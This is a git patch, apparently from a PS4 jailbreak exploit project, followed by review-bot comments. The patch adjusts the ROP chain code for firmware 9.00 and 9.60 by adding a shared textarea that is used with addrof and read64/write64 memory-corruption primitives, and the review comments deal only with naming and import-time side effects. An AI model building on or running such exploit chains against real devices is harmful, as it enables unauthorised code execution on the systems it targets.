From 8d4cdff0f2d8fbfad02ad01ff0dec637f4a9c9ac Mon Sep 17 00:00:00 2001
From: Kameleon <77245601+kmeps4@users.noreply.github.com>
Date: Sat, 27 Jan 2024 21:38:19 -0600
Subject: [PATCH] adding rop_ta missing declaration

---
 rop/900.mjs | 6 ++++--
 rop/960.mjs | 9 ++++++---
 2 files changed, 10 insertions(+), 5 deletions(-)

diff --git a/rop/900.mjs b/rop/900.mjs
index e41c32a..49cc8da 100644
--- a/rop/900.mjs
+++ b/rop/900.mjs
@@ -220,6 +220,9 @@ function init_gadget_map(gadget_map, offset_map, base_addr) {
 }
 }

+// helper object for ROP
+const rop_ta = document.createElement('textarea');
+
 class Chain900Base extends ChainBase {
 constructor() {
 super();
@@ -482,10 +485,9 @@ class Chain900 extends Chain900Base {
 // that we think is large enough for all of them.
 const vtable_size = 0x1000;
 const webcore_ta_size = 0x180;
- const rop_ta = {};
+
 const ta_clone = {};
 this.ta_clone = ta_clone;
- this.rop_ta = rop_ta;
 const clone_p = mem.addrof(ta_clone);
 const ta_p = mem.addrof(rop_ta);

diff --git a/rop/960.mjs b/rop/960.mjs
index a9e70b8..0b149cc 100644
--- a/rop/960.mjs
+++ b/rop/960.mjs
@@ -219,7 +222,10 @@ function init_gadget_map(gadget_map, offset_map, base_addr) {
 }
 }

-class Chain950Base extends ChainBase {
+// helper object for ROP
+const rop_ta = document.createElement('textarea');
+
+class Chain960Base extends ChainBase {
 constructor() {
 super();

@@ -467,7 +470,7 @@ class Chain950Base extends ChainBase {
 }

 // Chain for PS4 9.60
-class Chain950 extends Chain950Base {
+class Chain950 extends Chain960Base {
 constructor() {
 super();

@@ -485,7 +488,7 @@ class Chain950 extends Chain950Base {
 const ta_clone = {};
 this.ta_clone = ta_clone;
 const clone_p = mem.addrof(ta_clone);
-//const ta_p = mem.addrof(rop_ta);
+ const ta_p = mem.addrof(rop_ta);

 for (let i = js_size; i < js_ta_size; i += 8) {
 clone_p.write64(i, ta_p.read64(i));
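Review bot: In the first hunk of rop/900.mjs, the new module-level `const rop_ta = document.createElement('textarea');` runs at import time, so importing the module now requires a DOM `document`. It also creates one element shared by every chain instance, where the Chain900 constructor previously built a local `{}` (removed in the second hunk). The comment `// helper object for ROP` records neither fact; something like `// Shared <textarea>, created once at module load; needs a DOM document at import time.` would. The identical declaration is added in the first hunk of rop/960.mjs, so the same applies there, and the duplication suggests one shared export if a common module exists (not visible from this patch).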
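Review bot: In the second hunk of rop/960.mjs the derived class is still declared as `class Chain950 extends Chain960Base {` although its base was renamed to `Chain960Base` and the comment directly above reads `// Chain for PS4 9.60`, so the file now mixes two version numbers in its class names. `class Chain960 extends Chain960Base {` would match both the comment and the base. The export statement and any importers are outside this hunk, so check first whether the old name is part of an import contract. The class body also continues past the end of the hunk.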